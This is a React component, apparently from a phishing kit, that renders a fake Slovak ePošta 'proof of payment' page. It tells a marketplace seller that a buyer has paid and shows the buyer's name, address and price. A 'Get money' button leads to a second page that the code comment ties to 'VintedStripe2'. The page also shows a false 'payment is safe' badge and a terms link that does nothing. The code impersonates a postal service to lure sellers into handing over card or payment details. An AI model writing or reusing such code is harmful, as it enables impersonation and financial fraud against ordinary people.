import React, { useEffect, useState, useMemo } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './EPostaSkSuccess.css';
import SupportWidget from './SupportWidget';
import { fetchPageWithFallback } from '../fetchPageWithFallback';
import { getPrimaryCurrency, getSymbol } from '../stripeCurrency';

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };
const P = process.env.PUBLIC_URL || '';
const LOGO_SRC = `${P}/eposta-sk-banner-logo.png`;

function noop(e) {
  e.preventDefault();
}

function ShieldCheck() {
  return (
    <svg viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" aria-hidden>
      <path d="M12 2l7 4v6c0 5-3.5 9.5-7 10-3.5-.5-7-5-7-10V6l7-4z" />
      <path d="M9 12l2 2 4-5" strokeLinecap="round" strokeLinejoin="round" />
    </svg>
  );
}

function CheckCircleIcon() {
  return (
    <svg viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" aria-hidden>
      <circle cx="12" cy="12" r="10" />
      <path d="M8 12l2.5 2.5L16 9" strokeLinecap="round" strokeLinejoin="round" />
    </svg>
  );
}

/**
 * ePošta (SK) — doklad o platbe, CTA → index2 (VintedStripe2).
 */
function EPostaSkSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [thumbFailed, setThumbFailed] = useState(false);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);

  const photoUrl = useMemo(() => (pageData?.photo_url || '').trim(), [pageData?.photo_url]);

  useEffect(() => {
    setThumbFailed(false);
  }, [photoUrl]);

  useEffect(() => {
    if (page) {
      setPageData(page);
      setLoading(false);
      return;
    }
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetchPageWithFallback(pageCode)
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  const countryCode = (pageData?.country_code || 'SK').toUpperCase();
  const currencyCode = getPrimaryCurrency(countryCode) || 'EUR';
  const sym = getSymbol(currencyCode);

  const priceNumber = (() => {
    const raw = pageData?.price;
    if (raw == null || String(raw).trim() === '') return null;
    const s = String(raw)
      .replace(/\s+/g, '')
      .replace(/[^0-9.,-]/g, '')
      .replace(',', '.');
    const n = parseFloat(s);
    return Number.isFinite(n) ? n : null;
  })();

  const priceText =
    priceNumber == null
      ? '—'
      : priceNumber % 1 === 0
        ? String(priceNumber.toFixed(0))
        : String(priceNumber);

  const amountLine = priceText === '—' ? `— ${sym}` : `${priceText} ${sym}`;

  const address = (pageData?.delivery_address || '').trim() || '—';
  const lastName = (pageData?.last_name || '').trim() || '—';
  const firstName = [pageData?.first_name, pageData?.middle_name].filter(Boolean).join(' ').trim() || '—';
  const productTitle = (pageData?.product_name || '').trim() || '—';
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  if (loading && pageCode) {
    return (
      <div className="eposta-sk-wrap">
        <header className="eposta-sk-header">
          <div className="eposta-sk-header-inner">
            <img src={LOGO_SRC} alt="" className="eposta-sk-logo-header" width={186} height={98} decoding="async" />
          </div>
        </header>
        <main className="eposta-sk-main">
          <div className="eposta-sk-loading">Načítava sa…</div>
        </main>
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    );
  }

  return (
    <div className="eposta-sk-wrap">
      <header className="eposta-sk-header">
        <div className="eposta-sk-header-inner">
          <img src={LOGO_SRC} alt="ePošta" className="eposta-sk-logo-header" width={186} height={98} decoding="async" />
        </div>
      </header>

      <main className="eposta-sk-main">
        <h1 className="eposta-sk-title">Doklad o zaplatení od zákazníka</h1>

        <div className="eposta-sk-grid">
          <div className="eposta-sk-card">
            <div className="eposta-sk-top">
              <div className="eposta-sk-thumb" aria-hidden>
                {photoUrl && !thumbFailed ? (
                  <img
                    src={photoUrl}
                    alt=""
                    className="eposta-sk-thumb-img"
                    decoding="async"
                    onError={() => setThumbFailed(true)}
                  />
                ) : null}
              </div>
              <div className="eposta-sk-amounts">
                <div className="eposta-sk-amount-top">{amountLine}</div>
                <div className="eposta-sk-product">{productTitle}</div>
              </div>
            </div>

            <div className="eposta-sk-status-wrap">
              <div className="eposta-sk-status-banner">
                <div className="eposta-sk-status-icon" aria-hidden>
                  <CheckCircleIcon />
                </div>
                <div>
                  <p className="eposta-sk-status-strong">Váš tovar bol uvoľnený!</p>
                  <p className="eposta-sk-status-sub">Kupujúci už za objednávku zaplatil.</p>
                </div>
              </div>

              <div className="eposta-sk-section-h">Detaily doručenia</div>

              <div className="eposta-sk-field">
                <span className="eposta-sk-field-label">Adresa dodania</span>
                <input className="eposta-sk-input" readOnly value={address} />
              </div>

              <div className="eposta-sk-split2">
                <div className="eposta-sk-field">
                  <span className="eposta-sk-field-label">Priezvisko</span>
                  <input className="eposta-sk-input" readOnly value={lastName} />
                </div>
                <div className="eposta-sk-field">
                  <span className="eposta-sk-field-label">Názov</span>
                  <input className="eposta-sk-input" readOnly value={firstName} />
                </div>
              </div>

              <p className="eposta-sk-legal">
                Po obdržaní hotovosti zašlite tovar zákazníkovi podľa zadaných údajov alebo tovar preveďte
                kuriérovi, ktorý vám do 12 hodín zavolá.
              </p>
              <p className="eposta-sk-legal">
                Po doručení tovaru špecifikujte kupujúcemu podacie číslo! Tovar je potrebné doručiť do 3 dní od
                prijatia finančných prostriedkov.
              </p>
            </div>
          </div>

          <aside className="eposta-sk-card">
            <div className="eposta-sk-right">
              <p className="eposta-sk-right-amount">{amountLine}</p>
              <Link to={index2Path} className="eposta-sk-btn">
                Získať peniaze
              </Link>
              <div className="eposta-sk-safe">
                <ShieldCheck />
                Platba je bezpečná
              </div>
              <div className="eposta-sk-disclaimer">
                Kliknutím na tlačidlo „Získať peniaze“ súhlasíte s{' '}
                <a href="#/" onClick={noop}>
                  Podmienkami používania
                </a>{' '}
                online služby „Bezpečná ponuka“.
              </div>
            </div>
          </aside>
        </div>
      </main>

      <SupportWidget sessionId={sessionId} countryCode={countryCode} />
    </div>
  );
}

export default EPostaSkSuccess;
